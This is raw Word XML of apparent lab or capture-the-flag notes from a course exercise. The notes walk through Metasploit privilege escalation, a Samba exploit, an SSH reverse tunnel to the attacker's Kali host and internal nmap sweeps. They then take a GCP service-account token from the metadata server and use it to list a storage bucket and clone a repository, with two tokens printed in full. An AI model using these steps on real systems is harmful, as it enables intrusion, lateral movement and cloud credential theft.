        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bpf_sign_extension_priv_esc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="268E338E" w14:textId="5668E96C" w:rsidR="0083557A" w:rsidRDefault="0083557A" w:rsidP="008355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SESSION [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session id]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CFB5F2" w14:textId="70768B1A" w:rsidR="0083557A" w:rsidRDefault="0083557A" w:rsidP="008355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LHOST 192.168.0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC36028" w14:textId="1DC36EE2" w:rsidR="0083557A" w:rsidRDefault="0083557A" w:rsidP="008355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LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D818EFE" w14:textId="3F9A3DF3" w:rsidR="0083557A" w:rsidRDefault="0083557A" w:rsidP="008355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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4758F7" w14:textId="14AD2AC0" w:rsidR="0083557A" w:rsidRDefault="0083557A" w:rsidP="008355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26FDB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">python3.6 -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F26FDB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F26FDB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F26FDB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F26FDB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524DD6CC" w14:textId="1EB5EE6B" w:rsidR="00F32553" w:rsidRDefault="00F32553" w:rsidP="008355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Logged in as root :)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44884108" w14:textId="5BFD77C5" w:rsidR="00F32553" w:rsidRDefault="00F32553" w:rsidP="00F3255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into home directory gives flag 6be6ef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E8A19A" w14:textId="4DCA7D70" w:rsidR="00BF7F60" w:rsidRDefault="001752A1" w:rsidP="00BF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Common Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3B212E" w14:textId="7EEEACEE" w:rsidR="001752A1" w:rsidRDefault="001752A1" w:rsidP="001752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Still on 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from Cuiteur…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D1FFF" w14:textId="11D86F61" w:rsidR="001752A1" w:rsidRDefault="001752A1" w:rsidP="001752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potential privilege escalation exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A94ECD6" w14:textId="77777777" w:rsidR="001752A1" w:rsidRDefault="001752A1" w:rsidP="001752A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752A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use post/multi/recon/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001752A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>local_exploit_suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001752A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2001CBD0" w14:textId="03EDF321" w:rsidR="001752A1" w:rsidRPr="001752A1" w:rsidRDefault="001752A1" w:rsidP="001752A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752A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set SESSION [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001752A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001752A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> session id]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0F82DC" w14:textId="3FA04CAA" w:rsidR="001752A1" w:rsidRDefault="001752A1" w:rsidP="001752A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A9F406" w14:textId="6A201B07" w:rsidR="00722428" w:rsidRDefault="00722428" w:rsidP="007224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up SSH port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB9DB5E" w14:textId="3E5A3210" w:rsidR="00722428" w:rsidRDefault="00722428" w:rsidP="0072242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remote machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEEE819" w14:textId="7BFA8088" w:rsidR="00722428" w:rsidRDefault="00722428" w:rsidP="00722428">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3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722428">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i </w:t>
      </w:r>
      <w:r w:rsidR="005E11BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>~/.ssh/</w:t>
      </w:r>
      <w:r w:rsidRPr="00722428">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa -R 19999:localhost:22 </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00450EE6">
        <w:rPr>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "mailto:kali@192.168.0.9" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00233247">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>kali@192.168.0.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="694208F4" w14:textId="3B99F8A4" w:rsidR="00722428" w:rsidRDefault="00722428" w:rsidP="00722428">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2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On local machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE489EA" w14:textId="09AF350E" w:rsidR="005E11BF" w:rsidRDefault="005E11BF" w:rsidP="005E11BF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3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sudo service ssh start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F146CF" w14:textId="025650EE" w:rsidR="00722428" w:rsidRDefault="00722428" w:rsidP="00722428">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3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722428">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>ssh -i ~/.ssh/id_rsa lord_nikon@localhost -p 19999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446B65EB" w14:textId="4C0C5E5F" w:rsidR="001E6AC9" w:rsidRDefault="001E6AC9" w:rsidP="001E6AC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E6AC9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Put my own </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E6AC9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E6A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public key in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lord_nikon’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/.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/authorized_keys2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118D420C" w14:textId="72A0E282" w:rsidR="001E6AC9" w:rsidRDefault="004915D6" w:rsidP="001E6AC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1E6AC9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E6AC9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> lord_nikon@10.0.7.6 -p 52961</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067C687B" w14:textId="0A5002CE" w:rsidR="00C960D3" w:rsidRDefault="00C960D3" w:rsidP="001E6A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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iproute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to scan the network. Found several subnets to scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30499C7A" w14:textId="1B83358B" w:rsidR="001E6AC9" w:rsidRDefault="00C960D3" w:rsidP="00C960D3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C960D3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C960D3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C960D3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C960D3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> --script=banner --version-intensity 5 -p 139,445 10.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.0.0/22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186BDBAE" w14:textId="7E64C1E5" w:rsidR="00C960D3" w:rsidRDefault="00C960D3" w:rsidP="00C960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10.0.2.164 has open ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6F7881" w14:textId="0CFC3A07" w:rsidR="00C960D3" w:rsidRDefault="00C960D3" w:rsidP="00C960D3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C960D3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C960D3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C960D3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C960D3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> --script=banner --version-intensity 5 -p 139,445 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.0.4.0/22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A05E7CC" w14:textId="77777777" w:rsidR="007D5165" w:rsidRDefault="00C960D3" w:rsidP="007D516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CD6E56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.0.6.133</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> has open ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5196C4E0" w14:textId="78777FFF" w:rsidR="00DE2B20" w:rsidRPr="007D5165" w:rsidRDefault="00CD6E56" w:rsidP="007D516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5165">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Open remote connection to port 445 in 10.0.6.133</w:t>
      </w:r>
      <w:r w:rsidR="007D5165">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> through localhost:4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70857EA4" w14:textId="3E645C90" w:rsidR="00CD6E56" w:rsidRPr="007D5165" w:rsidRDefault="00E74169" w:rsidP="007D51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CD6E56" w:rsidRPr="007D5165">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD6E56" w:rsidRPr="007D5165">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L 4444:10.0.6.133:445 </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="00CD6E56" w:rsidRPr="007D5165">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>lord_nikon@10.0.7.6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CD6E56" w:rsidRPr="007D5165">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 52961 -</w:t>
      </w:r>
      <w:r w:rsidR="004915D6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00CD6E56" w:rsidRPr="007D5165">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD6E56" w:rsidRPr="007D5165">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD6E56" w:rsidRPr="007D5165">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD6E56" w:rsidRPr="007D5165">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01E116BF" w14:textId="1BF449BE" w:rsidR="007D5165" w:rsidRDefault="007D5165" w:rsidP="007D516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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05BDB3D3" w14:textId="18F1F5C7" w:rsidR="007D5165" w:rsidRDefault="00421067" w:rsidP="007D516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165">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidR="007D5165" w:rsidRPr="007D5165">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D5165" w:rsidRPr="007D5165">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D5165" w:rsidRPr="007D5165">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D5165" w:rsidRPr="007D5165">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is_known_pipename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40DB39BB" w14:textId="156E8A38" w:rsidR="007D5165" w:rsidRDefault="00421067" w:rsidP="007D516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165">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set RPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A48BCE" w14:textId="4CB93F4A" w:rsidR="007D5165" w:rsidRDefault="00421067" w:rsidP="007D516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165">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set RHOSTS 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182275C5" w14:textId="79BDD584" w:rsidR="007D5165" w:rsidRDefault="00421067" w:rsidP="007D516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165">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC8BD81" w14:textId="16300ACD" w:rsidR="007D5165" w:rsidRDefault="007D5165" w:rsidP="007D516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Root access :)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1B27A6" w14:textId="56C5F714" w:rsidR="007D5165" w:rsidRDefault="003C0804" w:rsidP="003C08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root@cloud-hopper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03A4ADCF" w14:textId="27C49B3E" w:rsidR="003C0804" w:rsidRDefault="003C0804" w:rsidP="003C08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C0804">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C0804">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true" -H "Metadata-Flavor: Google" -H "X-Cloud-Action: Compute"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F1A972" w14:textId="6B609835" w:rsidR="003C0804" w:rsidRDefault="003C0804" w:rsidP="003C08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Got </w:t>
      </w:r>
      <w:r w:rsidRPr="003C0804">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{"bucket":"en2720-w11-7a411381794a43e8c206623dc23a5596db159d99","sourcerepo":"twmn_sourcerepo_en2720-w11"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BC2A6D" w14:textId="488C1900" w:rsidR="003C0804" w:rsidRDefault="003C0804" w:rsidP="003C08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bucket=”[above]”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA21247" w14:textId="274BF361" w:rsidR="003C0804" w:rsidRDefault="003C0804" w:rsidP="003C08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C0804">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl "http://metadata.google.internal/computeMetadata/v1/project/project-id" -H "Metadata-Flavor: Google" -H "X-Cloud-Action: Compute"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDF0AC3" w14:textId="67683D3A" w:rsidR="003C0804" w:rsidRDefault="003C0804" w:rsidP="003C08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r w:rsidRPr="003C0804">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>en2720-2017</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2501D567" w14:textId="45A9635D" w:rsidR="003C0804" w:rsidRDefault="003C0804" w:rsidP="003C08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project=”</w:t>
      </w:r>
      <w:r w:rsidRPr="003C0804">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>en2720-2017</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2019CF99" w14:textId="68DF7465" w:rsidR="003C0804" w:rsidRDefault="003C0804" w:rsidP="003C08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Pr="003C0804">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>url "http://metadata.google.internal/computeMetadata/v1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>instance/service-accounts/default/token</w:t>
      </w:r>
      <w:r w:rsidRPr="003C0804">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" -H "Metadata-Flavor: Google" -H "X-Cloud-Action: Compute"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB2B88A" w14:textId="6A58559A" w:rsidR="003C0804" w:rsidRDefault="003C0804" w:rsidP="003C08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r w:rsidRPr="003C0804">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ya29.c.b0AUFJQsGZE9Pc-HvPUwJN907Z6IaaNcl9XU9yveaB_yKQx2UO-kF2kgHWm5rerIxj1Y9QYSjp9Orx2pHLb_Lyzpbm7KD1yPxE9vccr8w_vYhqODn-Bwl6PB5CdD7ZNXeWAMk0YuhD5t06jc53H8gNNuuNslM4BdyVFxBgyd8Cqq8WMbYrVE-v9VhQBklYrUdXwd6hi87zuw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D8E509" w14:textId="737F2E19" w:rsidR="003C0804" w:rsidRDefault="00502E1F" w:rsidP="003C080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0804">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>token=“</w:t>
      </w:r>
      <w:r w:rsidRPr="00502E1F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ya29.c.b0AUFJQsEg5mH7pZxdyiSkiZp5fWUCzktf-LeIFL1ERapqwllnd5C2SpM6b8WwGM0jZrj37YyE5DSXxj83tFAbpMvTU0laGke35TflLq4Kd5qVU4fhU7tN8OfO1tWt4qUAEVhRfhEhlJRT0BQO91HhSUdKlvoVUqdhKtnxEvjO3qOQfaL85ir4zgTsXWHFbrEnZeceYHty7A</w:t>
      </w:r>
      <w:r w:rsidR="003C0804">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7049A6C7" w14:textId="44B971B7" w:rsidR="003C0804" w:rsidRDefault="00D86C3C" w:rsidP="003C08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0804" w:rsidRPr="003C0804">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl "https://storage.googleapis.com/storage/v1/b/$bucket/o?project=$project" -H "Authorization: Bearer $token" -H "X-Cloud-Action: Storage"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D1BD4D" w14:textId="0518D907" w:rsidR="00F717B9" w:rsidRPr="00F717B9" w:rsidRDefault="00D7673C" w:rsidP="00F717B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7673C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Found flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471ADF8F" w14:textId="4D9F67A5" w:rsidR="00D7673C" w:rsidRDefault="008D55A9" w:rsidP="00D767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Still in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>root@cloud-hopper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77581076" w14:textId="4789A2F4" w:rsidR="008D55A9" w:rsidRDefault="008D55A9" w:rsidP="008D55A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C0804">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl "http://metadata.google.internal/computeMetadata/v1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>instance</w:t>
      </w:r>
      <w:r w:rsidRPr="003C0804">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attributes/sourcerepo</w:t>
      </w:r>
      <w:r w:rsidRPr="003C0804">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" -H "Metadata-Flavor: Google" -H "X-Cloud-Action: Compute"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063D3785" w14:textId="4DAE76EC" w:rsidR="00A87275" w:rsidRDefault="00A87275" w:rsidP="00A8727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A87275">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>twmn_sourcerepo_en2720-w11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575FD4DA" w14:textId="55ED9731" w:rsidR="00932412" w:rsidRPr="00932412" w:rsidRDefault="00502E1F" w:rsidP="0093241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87275">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>repo=”</w:t>
      </w:r>
      <w:r w:rsidR="00A87275" w:rsidRPr="00A87275">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>twmn_sourcerepo_en2720-w11</w:t>
      </w:r>
      <w:r w:rsidR="00A87275">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128805BA" w14:textId="2EEBEBE7" w:rsidR="00F717B9" w:rsidRDefault="00F717B9" w:rsidP="00F717B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32412">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gcloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00932412">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> source repos clone $repo $project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2995D1" w14:textId="57E3B69F" w:rsidR="00F717B9" w:rsidRDefault="00D16DF3" w:rsidP="00F717B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D16DF3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D16DF3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D16DF3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
